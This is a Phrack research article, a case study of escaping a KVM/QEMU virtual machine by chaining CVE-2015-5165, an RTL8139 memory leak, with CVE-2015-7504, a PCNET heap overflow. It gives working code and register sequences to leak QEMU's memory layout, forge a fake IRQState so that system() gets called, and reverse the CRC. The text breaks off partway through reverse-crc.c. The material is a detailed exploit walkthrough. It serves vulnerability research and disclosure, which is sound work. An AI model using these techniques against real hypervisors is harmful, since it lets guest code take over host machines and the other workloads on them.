Phrack Inc. Volume 16 Issue 70 File 05
==Phrack Inc.==
Volume 0x10, Issue 0x46, Phile #0x05 of 0x0f
|=-----------------------------------------------------------------------=|
|=----------------------------=[ VM escape ]=----------------------------=|
|=-----------------------------------------------------------------------=|
|=-------------------------=[ QEMU Case Study ]=-------------------------=|
|=-----------------------------------------------------------------------=|
|=---------------------------=[ Mehdi Talbi ]=---------------------------=|
|=--------------------------=[ Paul Fariello ]=--------------------------=|
|=-----------------------------------------------------------------------=|
--[ Table of contents
1 - Introduction
2 - KVM/QEMU Overview
2.1 - Workspace Environment
2.2 - QEMU Memory Layout
2.3 - Address Translation
3 - Memory Leak Exploitation
3.1 - The Vulnerable Code
3.2 - Setting up the Card
3.3 - Exploit
4 - Heap-based Overflow Exploitation
4.1 - The Vulnerable Code
4.2 - Setting up the Card
4.3 - Reversing CRC
4.4 - Exploit
5 - Putting All Together
5.1 - RIP Control
5.2 - Interactive Shell
5.3 - VM-Escape Exploit
5.4 - Limitations
6 - Conclusions
7 - Greets
8 - References
9 - Source Code
--[ 1 - Introduction
Virtual machines are nowadays heavily deployed for personal use or within
the enterprise segment. Network security vendors, for instance, use
different VMs to analyze malware in a controlled and confined environment.
A natural question arises: can malware escape from the VM and execute code
on the host machine?
Last year, Jason Geffner from CrowdStrike reported a serious bug in QEMU
affecting the virtual floppy drive code that could allow an attacker to
escape from the VM [1] to the host. Even though this vulnerability received
considerable attention in the netsec community - probably because it has a
dedicated name (VENOM) - it wasn't the first of its kind.
In 2011, Nelson Elhage [2] reported and successfully exploited a
vulnerability in QEMU's emulation of PCI device hotplugging. The exploit is
available at [3].
Recently, Xu Liu and Shengping Wang, from Qihoo 360, showcased at HITB 2016
a successful exploit on KVM/QEMU. They exploited two vulnerabilities
(CVE-2015-5165 and CVE-2015-7504) present in two different network card
device emulator models, namely, RTL8139 and PCNET. During their
presentation, they outlined the main steps towards code execution on the
host machine but provided neither an exploit nor the technical details
needed to reproduce it.
In this paper, we provide an in-depth analysis of CVE-2015-5165 (a
memory-leak vulnerability) and CVE-2015-7504 (a heap-based overflow
vulnerability), along with working exploits. Combining these two exploits
allows an attacker to break out of a VM and execute code on the target
host. We discuss the technical details needed to exploit the
vulnerabilities in QEMU's network card device emulation, and provide
generic techniques that could be re-used to exploit future bugs in QEMU,
for instance an interactive bindshell that leverages shared memory areas
and shared code.
--[ 2 - KVM/QEMU Overview
KVM (Kernel-based Virtual Machine) is a kernel module that provides a full
virtualization infrastructure for user space programs. It allows one to run
multiple virtual machines running unmodified Linux or Windows images.
The user space component of KVM is included in mainline QEMU (Quick
Emulator), which notably handles device emulation.
----[ 2.1 - Workspace Environment
To make things easier for those who want to use the sample code given
throughout this paper, we provide here the main steps to reproduce our
development environment.
Since the vulnerabilities we are targeting have already been patched, we
need to check out the source from the QEMU repository and switch to the
commit that precedes the fix for these vulnerabilities. Then, we configure
QEMU only for the x86_64 target and enable debug:
$ git clone git://git.qemu-project.org/qemu.git
$ cd qemu
$ git checkout bd80b59
$ mkdir -p bin/debug/native
$ cd bin/debug/native
$ ../../../configure --target-list=x86_64-softmmu --enable-debug \
      --disable-werror
$ make
In our testing environment, we build QEMU using GCC version 4.9.2.
For the rest, we assume that the reader already has a Linux x86_64 image
that can be run with the following command line:
$ ./qemu-system-x86_64 -enable-kvm -m 2048 -display vnc=:89 \
      -netdev user,id=t0, -device rtl8139,netdev=t0,id=nic0 \
      -netdev user,id=t1, -device pcnet,netdev=t1,id=nic1 \
      -drive file=<path_to_image>,format=qcow2,if=ide,cache=writeback
We allocate 2GB of memory and create two network interface cards: RTL8139
and PCNET.
We are running QEMU on Debian 7 with a 3.16 kernel on the x86_64
architecture.
----[ 2.2 - QEMU Memory Layout
The physical memory allocated for the guest is actually an mmap'ed private
region in the virtual address space of QEMU. It's important to note that
the PROT_EXEC flag is not enabled while allocating the physical memory of
the guest.
The following figure illustrates how the guest's memory and the host's
memory cohabit.
                        Guest's processes
                     +--------------------+
Virtual addr space   |                    |
                     +--------------------+
                     |                    |
                     \__   Page Table     \__
                        \                    \
                         |                    |  Guest kernel
                    +----+--------------------+----------------+
Guest's phy. memory |    |                    |                |
                    +----+--------------------+----------------+
                    |                                          |
                    \__                                        \__
                       \                                          \
                        |             QEMU process                 |
                   +----+------------------------------------------+
Virtual addr space |    |                                          |
                   +----+------------------------------------------+
                   |                                               |
                    \__                Page Table                   \__
                       \                                               \
                        |                                               |
                   +----+-----------------------------------------------++
Physical memory    |    |                                               ||
                   +----+-----------------------------------------------++
Additionally, QEMU reserves a memory region for BIOS and ROM. These
mappings are available in QEMU's maps file:
7f1824ecf000-7f1828000000 rw-p 00000000 00:00 0
7f1828000000-7f18a8000000 rw-p 00000000 00:00 0 [2 GB of RAM]
7f18a8000000-7f18a8992000 rw-p 00000000 00:00 0
7f18a8992000-7f18ac000000 ---p 00000000 00:00 0
7f18b5016000-7f18b501d000 r-xp 00000000 fd:00 262489 [first shared lib]
7f18b501d000-7f18b521c000 ---p 00007000 fd:00 262489 ...
7f18b521c000-7f18b521d000 r--p 00006000 fd:00 262489 ...
7f18b521d000-7f18b521e000 rw-p 00007000 fd:00 262489 ...
... [more shared libs]
7f18bc01c000-7f18bc5f4000 r-xp 00000000 fd:01 30022647 [qemu-system-x86_64]
7f18bc7f3000-7f18bc8c1000 r--p 005d7000 fd:01 30022647 ...
7f18bc8c1000-7f18bc943000 rw-p 006a5000 fd:01 30022647 ...
7f18bd328000-7f18becdd000 rw-p 00000000 00:00 0 [heap]
7ffded947000-7ffded968000 rw-p 00000000 00:00 0 [stack]
7ffded968000-7ffded96a000 r-xp 00000000 00:00 0 [vdso]
7ffded96a000-7ffded96c000 r--p 00000000 00:00 0 [vvar]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
A more detailed explanation of memory management in a virtualized
environment can be found at [4].
----[ 2.3 - Address Translation
Within QEMU there exist two translation layers:
- From a guest virtual address to guest physical address. In our exploit,
we need to configure network card devices that require DMA access. For
example, we need to provide the physical address of Tx/Rx buffers to
correctly configure the network card devices.
- From a guest physical address to QEMU's virtual address space. In our
exploit, we need to inject fake structures and get their precise address
in QEMU's virtual address space.
On x64 systems, a virtual address is made of a page offset (bits 0-11) and
a page number. On Linux systems, the pagemap file enables user space
processes with CAP_SYS_ADMIN privileges to find out which physical frame
each virtual page is mapped to. The pagemap file contains, for each virtual
page, a 64-bit value documented on kernel.org [5]:
- Bits 0-54 : physical frame number if present.
- Bit 55 : page table entry is soft-dirty.
- Bit 56 : page exclusively mapped.
- Bits 57-60 : zero
- Bit 61 : page is file-page or shared-anon.
- Bit 62 : page is swapped.
- Bit 63 : page is present.
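The bit layout above can be turned into two small helpers. This is a
minimal sketch, not code from the exploit: the names pagemap_offset() and
pagemap_pfn() are ours, and we assume 4 kB pages. It also shows that the
byte offset of an entry, (va >> 12) * 8, is the same value as the more
compact expression (va >> 9) & ~7.

```c
#include <stdbool.h>
#include <stdint.h>

#define PAGE_SHIFT  12
#define PM_PFN_MASK ((1ULL << 55) - 1)  /* bits 0-54: frame number */
#define PM_PRESENT  (1ULL << 63)        /* bit 63: page is present */

/* Byte offset, inside the pagemap file, of the 8-byte entry that
 * describes the page containing virtual address va. */
static uint64_t pagemap_offset(uint64_t va)
{
    return (va >> PAGE_SHIFT) * sizeof(uint64_t);
}

/* Extract the frame number from a raw pagemap entry.
 * Returns false if the page is not present in memory. */
static bool pagemap_pfn(uint64_t entry, uint64_t *pfn)
{
    if (!(entry & PM_PRESENT))
        return false;
    *pfn = entry & PM_PFN_MASK;
    return true;
}
```

A caller would lseek() to pagemap_offset(va), read 8 bytes and pass them to
pagemap_pfn().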
To convert a virtual address to a physical one, we rely on Nelson Elhage's
code [3]. The following program allocates a buffer, fills it with the
string "Where am I?" and prints its physical address:
---[ mmu.c ]---
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <assert.h>
#include <inttypes.h>
#define PAGE_SHIFT 12
#define PAGE_SIZE (1 << PAGE_SHIFT)
#define PFN_PRESENT (1ull << 63)
#define PFN_PFN ((1ull << 55) - 1)
int fd;
/* Offset of an address within its page (bits 0-11). */
uint32_t page_offset(uint64_t addr)
{
    return addr & ((1 << PAGE_SHIFT) - 1);
}
/* Guest virtual address -> guest frame number, read from the pagemap. */
uint64_t gva_to_gfn(void *addr)
{
    uint64_t pme, gfn;
    off_t offset;
    /* One 8-byte entry per page: (addr >> PAGE_SHIFT) * 8. */
    offset = ((uintptr_t)addr >> 9) & ~7;
    if (lseek(fd, offset, SEEK_SET) == (off_t)-1)
        return -1;
    if (read(fd, &pme, 8) != 8)
        return -1;
    if (!(pme & PFN_PRESENT))
        return -1;
    gfn = pme & PFN_PFN;
    return gfn;
}
/* Guest virtual address -> guest physical address. */
uint64_t gva_to_gpa(void *addr)
{
    uint64_t gfn = gva_to_gfn(addr);
    assert(gfn != (uint64_t)-1);
    return (gfn << PAGE_SHIFT) | page_offset((uint64_t)addr);
}
int main()
{
    char *ptr;
    uint64_t ptr_mem;
    fd = open("/proc/self/pagemap", O_RDONLY);
    if (fd < 0) {
        perror("open");
        exit(1);
    }
    ptr = malloc(256);
    if (!ptr) {
        perror("malloc");
        exit(1);
    }
    strcpy(ptr, "Where am I?");
    printf("%s\n", ptr);
    ptr_mem = gva_to_gpa(ptr);
    printf("Your physical address is at 0x%"PRIx64"\n", ptr_mem);
    /* Keep the process alive so that gdb can inspect QEMU's memory. */
    getchar();
    return 0;
}
If we run the above code inside the guest and attach gdb to the QEMU
process, we can see that our buffer is located within the physical address
space allocated for the guest. More precisely, we note that the outputted
address is actually an offset from the base address of the guest physical
memory:
root@debian:~# ./mmu
Where am I?
Your physical address is at 0x78b0d010
(gdb) info proc mappings
process 14791
Mapped address spaces:
Start Addr End Addr Size Offset objfile
0x7fc314000000 0x7fc314022000 0x22000 0x0
0x7fc314022000 0x7fc318000000 0x3fde000 0x0
0x7fc319dde000 0x7fc31c000000 0x2222000 0x0
0x7fc31c000000 0x7fc39c000000 0x80000000 0x0
...
(gdb) x/s 0x7fc31c000000 + 0x78b0d010
0x7fc394b0d010: "Where am I?"
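The second translation layer therefore boils down to a single addition. The
sketch below is illustrative only: gpa_to_hva() is a hypothetical helper
name, and we assume that the guest RAM is one contiguous mapping in QEMU's
address space, as it is in our 2 GB setup.

```c
#include <stdint.h>

/* Guest physical address -> address in QEMU's virtual address space.
 * phy_mem_base is the start of the region that backs the guest RAM
 * (0x7fc31c000000 in the gdb session above). Assumes a single
 * contiguous RAM mapping. */
static uint64_t gpa_to_hva(uint64_t phy_mem_base, uint64_t gpa)
{
    return phy_mem_base + gpa;
}
```

With the values from the session above, gpa_to_hva(0x7fc31c000000,
0x78b0d010) gives 0x7fc394b0d010, the address inspected with gdb.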
--[ 3 - Memory Leak Exploitation
In the following, we will exploit CVE-2015-5165 - a memory leak
vulnerability that affects the RTL8139 network card device emulator - in
order to reconstruct the memory layout of QEMU. More precisely, we need to
leak (i) the base address of the .text segment in order to build our
shellcode and (ii) the base address of the physical memory allocated for
the guest in order to be able to get the precise address of some injected
dummy structures.
----[ 3.1 - The Vulnerable Code
The REALTEK network card supports two receive/transmit operation modes: C
mode and C+ mode. When the card is set up to use C+, the NIC device
emulator miscalculates the length of the IP packet data and ends up sending
more data than is actually available in the packet.
The vulnerability is present in the rtl8139_cplus_transmit_one function
from hw/net/rtl8139.c:
/* ip packet header */
ip_header *ip = NULL;
int hlen = 0;
uint8_t ip_protocol = 0;
uint16_t ip_data_len = 0;
uint8_t *eth_payload_data = NULL;
size_t eth_payload_len = 0;
int proto = be16_to_cpu(*(uint16_t *)(saved_buffer + 12));
if (proto == ETH_P_IP)
{
DPRINTF("+++ C+ mode has IP packet\n");
/* not aligned */
eth_payload_data = saved_buffer + ETH_HLEN;
eth_payload_len = saved_size - ETH_HLEN;
ip = (ip_header*)eth_payload_data;
if (IP_HEADER_VERSION(ip) != IP_HEADER_VERSION_4) {
DPRINTF("+++ C+ mode packet has bad IP version %d "
"expected %d\n", IP_HEADER_VERSION(ip),
IP_HEADER_VERSION_4);
ip = NULL;
} else {
hlen = IP_HEADER_LENGTH(ip);
ip_protocol = ip->ip_p;
ip_data_len = be16_to_cpu(ip->ip_len) - hlen;
}
}
The IP header contains two fields, hlen and ip->ip_len, that represent the
length of the IP header (20 bytes for a packet without options) and the
total length of the packet including the IP header, respectively. As shown
at the end of the snippet of code given above, there is no check to ensure
that ip->ip_len >= hlen while computing the length of the IP data
(ip_data_len). As ip_data_len is an unsigned 16-bit integer, the
subtraction wraps around to a large value, which leads to sending more data
than is actually available in the transmit buffer.
More precisely, ip_data_len is later used to compute the length of the TCP
data that is copied - chunk by chunk if the data exceeds the size of the
MTU - into a malloced buffer:
int tcp_data_len = ip_data_len - tcp_hlen;
int tcp_chunk_size = ETH_MTU - hlen - tcp_hlen;
int is_last_frame = 0;
for (tcp_send_offset = 0; tcp_send_offset < tcp_data_len;
tcp_send_offset += tcp_chunk_size) {
uint16_t chunk_size = tcp_chunk_size;
/* check if this is the last frame */
if (tcp_send_offset + tcp_chunk_size >= tcp_data_len) {
is_last_frame = 1;
chunk_size = tcp_data_len - tcp_send_offset;
}
memcpy(data_to_checksum, saved_ip_header + 12, 8);
if (tcp_send_offset) {
memcpy((uint8_t*)p_tcp_hdr + tcp_hlen,
(uint8_t*)p_tcp_hdr + tcp_hlen + tcp_send_offset,
chunk_size);
}
/* more code follows */
}
So, if we forge a malformed packet with a corrupted length (e.g.
ip->ip_len = hlen - 1), then we can leak approximately 64 KB from QEMU's
heap memory. Instead of sending a single packet, the network card device
emulator ends up sending 43 fragmented packets.
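The wrap-around at the heart of this bug can be reproduced in isolation.
The sketch below is ours and not QEMU code: ip_data_len_unchecked() mirrors
the vulnerable subtraction, while ip_data_len_checked() is a hypothetical
guarded variant shown only for contrast (it is not the upstream patch).

```c
#include <stddef.h>
#include <stdint.h>

/* Mirrors the vulnerable computation: the result is stored in a
 * uint16_t, so ip_len < hlen wraps around instead of going negative. */
static uint16_t ip_data_len_unchecked(uint16_t ip_len, int hlen)
{
    return (uint16_t)(ip_len - hlen);
}

/* Hypothetical guarded variant: returns -1 when the lengths are
 * inconsistent with each other or with the Ethernet payload size. */
static int ip_data_len_checked(uint16_t ip_len, int hlen,
                               size_t payload_len)
{
    if (hlen < 20 || ip_len < hlen || ip_len > payload_len)
        return -1;
    return ip_len - hlen;
}
```

With ip_len = 19 and hlen = 20, the unchecked version yields 0xffff, which
is where the roughly 64 KB of leaked data comes from.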
----[ 3.2 - Setting up the Card
In order to send our malformed packet and read the leaked data, we first
need to configure the Rx and Tx descriptor buffers on the card, and set up
some flags so that our packet flows through the vulnerable code path.
The figure below shows the RTL8139 registers. We will not detail all of
them but only those which are relevant to our exploit:
        +---------------------------+----------------------------+
0x00    |           MAC0            |            MAR0            |
        +---------------------------+----------------------------+
0x10    |                       TxStatus0                        |
        +--------------------------------------------------------+
0x20    |                        TxAddr0                         |
        +-------------------+-------+----------------------------+
0x30    |        RxBuf      |ChipCmd|                            |
        +-------------+------+------+----------------------------+
0x40    |   TxConfig  |  RxConfig   |            ...             |
        +-------------+-------------+----------------------------+
        |                                                        |
        |             skipping irrelevant registers              |
        |                                                        |
        +---------------------------+--+------+------------------+
0xd0    |           ...             |  |TxPoll|      ...         |
        +-------+------+------------+--+------+--+---------------+
0xe0    | CpCmd |  ... |RxRingAddrLO|RxRingAddrHI|    ...        |
        +-------+------+------------+------------+---------------+
- TxConfig: Enable/disable Tx flags such as TxLoopBack (enable loopback
test mode), TxCRC (do not append CRC to Tx Packets), etc.
- RxConfig: Enable/disable Rx flags such as AcceptBroadcast (accept
broadcast packets), AcceptMulticast (accept multicast packets), etc.
- CpCmd: C+ command register used to enable some functions such as
CPlusRxEnb (enable receive), CPlusTxEnb (enable transmit), etc.
- TxAddr0: Physical memory address of Tx descriptors table.
- RxRingAddrLO: Low 32-bits physical memory address of Rx descriptors
table.
- RxRingAddrHI: High 32-bits physical memory address of Rx descriptors
table.
- TxPoll: Tell the card to check Tx descriptors.
An Rx/Tx descriptor is defined by the following structure, where buf_lo and
buf_hi are the low 32 bits and high 32 bits of the physical memory address
of the Tx/Rx buffers, respectively. These addresses point to buffers
holding packets to be sent/received and must be aligned on a page size
boundary. The variable dw0 encodes the size of the buffer plus additional
flags such as the ownership flag, which denotes whether the buffer is owned
by the card or by the driver.
struct rtl8139_desc {
uint32_t dw0;
uint32_t dw1;
uint32_t buf_lo;
uint32_t buf_hi;
};
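As an illustration of how the two address fields are filled, here is a
small sketch. The helper desc_set_buffer() is hypothetical (it does not
appear in the exploit), and the 4 kB page size is an assumption taken from
the rest of this paper.

```c
#include <stdbool.h>
#include <stdint.h>

#define DESC_PAGE_SIZE 4096u

struct rtl8139_desc {
    uint32_t dw0;
    uint32_t dw1;
    uint32_t buf_lo;
    uint32_t buf_hi;
};

/* Store a 64-bit guest physical address in a descriptor.
 * Returns false if the buffer is not page-aligned. */
static bool desc_set_buffer(struct rtl8139_desc *d, uint64_t gpa)
{
    if (gpa & (DESC_PAGE_SIZE - 1))
        return false;
    d->buf_lo = (uint32_t)(gpa & 0xffffffffu);  /* low 32 bits  */
    d->buf_hi = (uint32_t)(gpa >> 32);          /* high 32 bits */
    return true;
}
```

With 2 GB of guest memory, every physical address fits in 32 bits, so
buf_hi stays at zero in practice.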
The network card is configured through the in*()/out*() primitives (from
sys/io.h), which requires CAP_SYS_RAWIO privileges. The following snippet
of code configures the card and sets up a single Tx descriptor.
#define RTL8139_PORT 0xc000
#define RTL8139_BUFFER_SIZE 1500
struct rtl8139_desc desc;
void *rtl8139_tx_buffer;
uint32_t phy_mem;
/* The Tx buffer must be page-aligned; the card needs its physical address */
rtl8139_tx_buffer = aligned_alloc(PAGE_SIZE, RTL8139_BUFFER_SIZE);
phy_mem = (uint32_t)gva_to_gpa(rtl8139_tx_buffer);
memset(&desc, 0, sizeof(struct rtl8139_desc));
/* dw0 holds the flags (high bits) and the buffer size (low bits) */
desc.dw0 |= CP_TX_OWN | CP_TX_EOR | CP_TX_LS | CP_TX_LGSEN |
            CP_TX_IPCS | CP_TX_TCPCS;
desc.dw0 += RTL8139_BUFFER_SIZE;
desc.buf_lo = phy_mem;
/* Raise the I/O privilege level so that in*()/out*() are allowed */
iopl(3);
outl(TxLoopBack, RTL8139_PORT + TxConfig);
outl(AcceptMyPhys, RTL8139_PORT + RxConfig);
outw(CPlusRxEnb|CPlusTxEnb, RTL8139_PORT + CpCmd);
outb(CmdRxEnb|CmdTxEnb, RTL8139_PORT + ChipCmd);
outl(phy_mem, RTL8139_PORT + TxAddr0);
outl(0x0, RTL8139_PORT + TxAddr0 + 0x4);
----[ 3.3 - Exploit
The full exploit (cve-2015-5165.c) is available inside the attached source
code tarball. The exploit configures the required registers on the card and
sets up Tx and Rx buffer descriptors. Then it forges a malformed IP packet
addressed to the MAC address of the card. This enables us to read the
leaked data by accessing the configured Rx buffers.
While analyzing the leaked data, we observed that several function pointers
are present. A closer look reveals that these function pointers are all
members of the same QEMU internal structure:
typedef struct ObjectProperty
{
gchar *name;
gchar *type;
gchar *description;
ObjectPropertyAccessor *get;
ObjectPropertyAccessor *set;
ObjectPropertyResolve *resolve;
ObjectPropertyRelease *release;
void *opaque;
QTAILQ_ENTRY(ObjectProperty) node;
} ObjectProperty;
QEMU follows an object model to manage devices, memory regions, etc. At
startup, QEMU creates several objects and assigns properties to them. For
example, the following call adds a "may-overlap" property to a memory
region object. This property is endowed with a getter method to retrieve
the value of this boolean property:
object_property_add_bool(OBJECT(mr), "may-overlap",
memory_region_get_may_overlap,
NULL, /* memory_region_set_may_overlap */
&error_abort);
The RTL8139 network card device emulator reserves a 64 KB buffer on the
heap to reassemble packets. There is a good chance that this buffer is
allocated in space left free by destroyed object properties.
In our exploit, we search for known object properties in the leaked memory.
More precisely, we look for 80-byte memory chunks (the chunk size of a
free'd ObjectProperty structure) where at least one of the function
pointers is set (get, set, resolve or release). Even if these addresses are
subject to ASLR, we can still guess the base address of the .text section.
Indeed, their page offsets are fixed (the 12 least significant bits of
virtual addresses are not randomized). We can then do some arithmetic to
get the address of some of QEMU's useful functions. We can also derive the
address of some libc functions such as mprotect() and system() from their
PLT entries.
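The arithmetic involved is simple enough to sketch. The helpers below are
illustrative and use names of our own; sym_off stands for the offset of a
known function inside the QEMU binary, which has to be taken from the
binary actually running on the host. We assume the load base is
page-aligned.

```c
#include <stdbool.h>
#include <stdint.h>

#define PAGE_OFF_MASK 0xfffULL

/* ASLR leaves the low 12 bits untouched, so a leaked pointer can only
 * be the runtime address of a symbol with the same page offset. */
static bool page_offset_matches(uint64_t leaked, uint64_t sym_off)
{
    return (leaked & PAGE_OFF_MASK) == (sym_off & PAGE_OFF_MASK);
}

/* Base address of the mapping, given a leaked pointer to a symbol
 * located sym_off bytes after that base. */
static uint64_t base_from_leak(uint64_t leaked, uint64_t sym_off)
{
    return leaked - sym_off;
}

/* Runtime address of any other symbol once the base is known. */
static uint64_t resolve(uint64_t base, uint64_t sym_off)
{
    return base + sym_off;
}
```

For instance, with a made-up offset of 0x345678, a leaked pointer
0x7f18bc361678 passes the page offset test and gives a base address of
0x7f18bc01c000.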
We have also noticed that the address PHY_MEM + 0x78 is leaked several
times, where PHY_MEM is the start address of the physical memory allocated
for the guest.
The current exploit searches the leaked memory and tries to resolve (i)
the base address of the .text segment and (ii) the base address of the
physical memory.
--[ 4 - Heap-based Overflow Exploitation
This section discusses the vulnerability CVE-2015-7504 and provides an
exploit that gets control over the %rip register.
----[ 4.1 - The Vulnerable Code
The AMD PCNET network card emulator is vulnerable to a heap-based overflow
when large packets are received in loopback test mode. The PCNET device
emulator reserves a 4 kB buffer to store packets. If the ADDFCS flag is
enabled on the Tx descriptor buffer, the card appends a CRC to received
packets, as shown in the following snippet of code from the pcnet_receive()
function in hw/net/pcnet.c. This does not pose a problem as long as the
size of the received packet does not exceed 4096 - 4 bytes. However, if the
packet is exactly 4096 bytes long, then we overflow the destination buffer
by 4 bytes.
uint8_t *src = s->buffer;
/* ... */
if (!s->looptest) {
memcpy(src, buf, size);
/* no need to compute the CRC */
src[size] = 0;
src[size + 1] = 0;
src[size + 2] = 0;
src[size + 3] = 0;
size += 4;
} else if (s->looptest == PCNET_LOOPTEST_CRC ||
!CSR_DXMTFCS(s) || size < MIN_BUF_SIZE+4) {
uint32_t fcs = ~0;
uint8_t *p = src;
while (p != &src[size])
CRC(fcs, *p++);
*(uint32_t *)p = htonl(fcs);
size += 4;
}
In the above code, s points to the main PCNET structure, where we can see
that beyond our vulnerable buffer, we can corrupt the value of the irq
variable:
struct PCNetState_st {
NICState *nic;
NICConf conf;
QEMUTimer *poll_timer;
int rap, isr, lnkst;
uint32_t rdra, tdra;
uint8_t prom[16];
uint16_t csr[128];
uint16_t bcr[32];
int xmit_pos;
uint64_t timer;
MemoryRegion mmio;
uint8_t buffer[4096];
qemu_irq irq;
void (*phys_mem_read)(void *dma_opaque, hwaddr addr,
uint8_t *buf, int len, int do_bswap);
void (*phys_mem_write)(void *dma_opaque, hwaddr addr,
uint8_t *buf, int len, int do_bswap);
void *dma_opaque;
int tx_busy;
int looptest;
};
The variable irq is a pointer to an IRQState structure that represents a
handler to execute:
typedef void (*qemu_irq_handler)(void *opaque, int n, int level);
struct IRQState {
Object parent_obj;
qemu_irq_handler handler;
void *opaque;
int n;
};
This handler is called several times by the PCNET card emulator. For
instance, at the end of the pcnet_receive() function, there is a call to
pcnet_update_irq() which in turn calls qemu_set_irq():
void qemu_set_irq(qemu_irq irq, int level)
{
if (!irq)
return;
irq->handler(irq->opaque, irq->n, level);
}
So, to exploit this vulnerability, we need to:
- allocate a fake IRQState structure with a handler to execute (e.g.
system()).
- compute the precise address of this allocated fake structure. Thanks to
the previous memory leak, we know exactly where our fake structure
resides in QEMU's process memory (at some offset from the base address
of the guest's physical memory).
- forge a 4 kB malicious packet.
- patch the packet so that the computed CRC on that packet matches the
address of our fake IRQState structure.
- send the packet.
When this packet is received by the PCNET card, it is handled by the
pcnet_receive() function that performs the following actions:
- copies the content of the received packet into the buffer variable.
- computes a CRC and appends it to the buffer. The buffer is overflowed
by 4 bytes and the value of the irq variable is corrupted.
- calls pcnet_update_irq() that in turn calls qemu_set_irq() with the
corrupted irq variable. Our handler is then executed.
Note that we can get control over the first two parameters of the
substituted handler (irq->opaque and irq->n), but thanks to a little trick
that we will see later, we can get control over the third parameter too
(level parameter). This will be necessary to call mprotect() function.
Note also that we corrupt an 8-byte pointer with 4 bytes. This is
sufficient in our testing environment to successfully get control over the
%rip register. However, this poses a problem with kernels compiled without
the CONFIG_ARCH_BINFMT_ELF_RANDOMIZE_PIE flag. This issue is discussed in
section 5.4.
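The effect of this partial overwrite can be modelled with a few lines of C.
This is a sketch with helper names of our own, assuming a little-endian
host such as x86_64: the 4 bytes stored right after the buffer replace the
low half of irq, and since the card stores htonl(fcs), the CRC that the
packet must produce is the byte-swapped low half of the target address.

```c
#include <stdbool.h>
#include <stdint.h>

/* Value of an 8-byte pointer after its 4 low bytes are overwritten. */
static uint64_t corrupt_low32(uint64_t ptr, uint32_t written)
{
    return (ptr & 0xffffffff00000000ULL) | written;
}

/* The overflow cannot change the upper 32 bits, so a target is only
 * reachable if it shares them with the original irq pointer. */
static bool reachable(uint64_t orig_ptr, uint64_t target)
{
    return (orig_ptr >> 32) == (target >> 32);
}

static uint32_t bswap32(uint32_t v)
{
    return (v >> 24) | ((v >> 8) & 0xff00u) |
           ((v << 8) & 0xff0000u) | (v << 24);
}

/* CRC that must be computed over the packet so that, once stored as
 * htonl(fcs) on a little-endian host, irq points to target. */
static uint32_t required_fcs_le(uint64_t target)
{
    return bswap32((uint32_t)target);
}
```

For example, corrupt_low32(0x7f669d2a5010, 0xdeadbeef) gives
0x7f66deadbeef; the original pointer value used here is made up.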
----[ 4.2 - Setting up the Card
Before going further, we need to set up the PCNET card in order to
configure the required flags, set up Tx and Rx descriptor buffers and
allocate ring buffers to hold packets to transmit and receive.
The AMD PCNET card can be accessed in 16-bit mode or 32-bit mode. This
depends on the current value of DWIO (a value stored in the card). In the
following, we detail the main registers of the PCNET card in 16-bit access
mode, as this is the default mode after a card reset:
0                                  16
+----------------------------------+
|              EPROM               |
+----------------------------------+
|      RDP - Data reg for CSR      |
+----------------------------------+
| RAP - Index reg for CSR and BCR  |
+----------------------------------+
|            Reset reg             |
+----------------------------------+
|      BDP - Data reg for BCR      |
+----------------------------------+
The card can be reset to default by accessing the reset register.
The card has two types of internal registers: CSR (Control and Status
Registers) and BCR (Bus Control Registers). Both types of registers are
accessed by first setting the index of the register that we want to access
in the RAP (Register Address Port) register. For instance, if we want to
init and restart the card, we need to set bit0 and bit1 of register CSR0
to 1. This can be done by writing 0 to the RAP register in order to select
the register CSR0, then by writing 0x3 to the RDP register:
outw(0x0, PCNET_PORT + RAP);
outw(0x3, PCNET_PORT + RDP);
The configuration of the card is done by filling an initialization
structure and passing the physical address of this structure to the card
(through registers CSR1 and CSR2):
struct pcnet_config {
uint16_t mode; /* working mode: promiscuous, looptest, etc. */
uint8_t rlen; /* number of rx descriptors in log2 base */
uint8_t tlen; /* number of tx descriptors in log2 base */
uint8_t mac[6]; /* mac address */
uint16_t _reserved;
uint8_t ladr[8]; /* logical address filter */
uint32_t rx_desc; /* physical address of rx descriptor buffer */
uint32_t tx_desc; /* physical address of tx descriptor buffer */
};
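The sequence of register writes needed to hand this structure to the card
can be sketched as follows. This is not the exploit code: the port writer
is passed as a function pointer (log_outw() below merely records the
writes) so that the sketch runs without I/O privileges, whereas on a real
guest one would pass a thin wrapper around outw(). The RDP and RAP offsets
are our assumption for the 16-bit access mode, and CSR1/CSR2 are assumed to
receive the low and high 16 bits of the address.

```c
#include <stdint.h>

enum { PCNET_RDP = 0x10, PCNET_RAP = 0x12 };   /* assumed offsets */
enum { CSR0_INIT = 0x1, CSR0_STRT = 0x2 };     /* bit0 and bit1   */

typedef void (*outw_fn)(uint16_t value, uint16_t port);

/* Stand-in for outw(): records writes instead of touching hardware. */
struct io_write { uint16_t value, port; };
static struct io_write io_log[16];
static int io_count;

static void log_outw(uint16_t value, uint16_t port)
{
    if (io_count < 16) {
        io_log[io_count].value = value;
        io_log[io_count].port = port;
        io_count++;
    }
}

/* Select CSR number idx through RAP, then write val through RDP. */
static void pcnet_csr_write(outw_fn out, uint16_t base,
                            uint16_t idx, uint16_t val)
{
    out(idx, (uint16_t)(base + PCNET_RAP));
    out(val, (uint16_t)(base + PCNET_RDP));
}

/* Pass the physical address of the init structure, then init/start. */
static void pcnet_load_config(outw_fn out, uint16_t base,
                              uint32_t config_gpa)
{
    pcnet_csr_write(out, base, 1, (uint16_t)(config_gpa & 0xffff));
    pcnet_csr_write(out, base, 2, (uint16_t)(config_gpa >> 16));
    pcnet_csr_write(out, base, 0, CSR0_INIT | CSR0_STRT);
}
```

Calling pcnet_load_config(log_outw, 0xc100, 0x78b0d000) records six writes,
the last one being 0x3 to RDP with CSR0 selected. The port 0xc100 and the
address are arbitrary example values.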
----[ 4.3 - Reversing CRC
As discussed previously, we need to fill a packet with data in such a way
that the computed CRC matches the address of our fake structure.
Fortunately, the CRC is reversible. Thanks to the ideas presented in [6],
we can apply a 4-byte patch to our packet so that the computed CRC matches
a value of our choice. The source code reverse-crc.c applies a patch to a
pre-filled buffer so that the computed CRC is equal to 0xdeadbeef.
---[ reverse-crc.c ]---
#include <stdio.h>
#include <stdint.h>
#define CRC(crc, ch) (crc = (crc >> 8) ^ crctab[(crc ^ (ch)) & 0xff])
/* generated using the AUTODIN II polynomial
* x^32 + x^26 + x^23 + x^22 + x^16 +
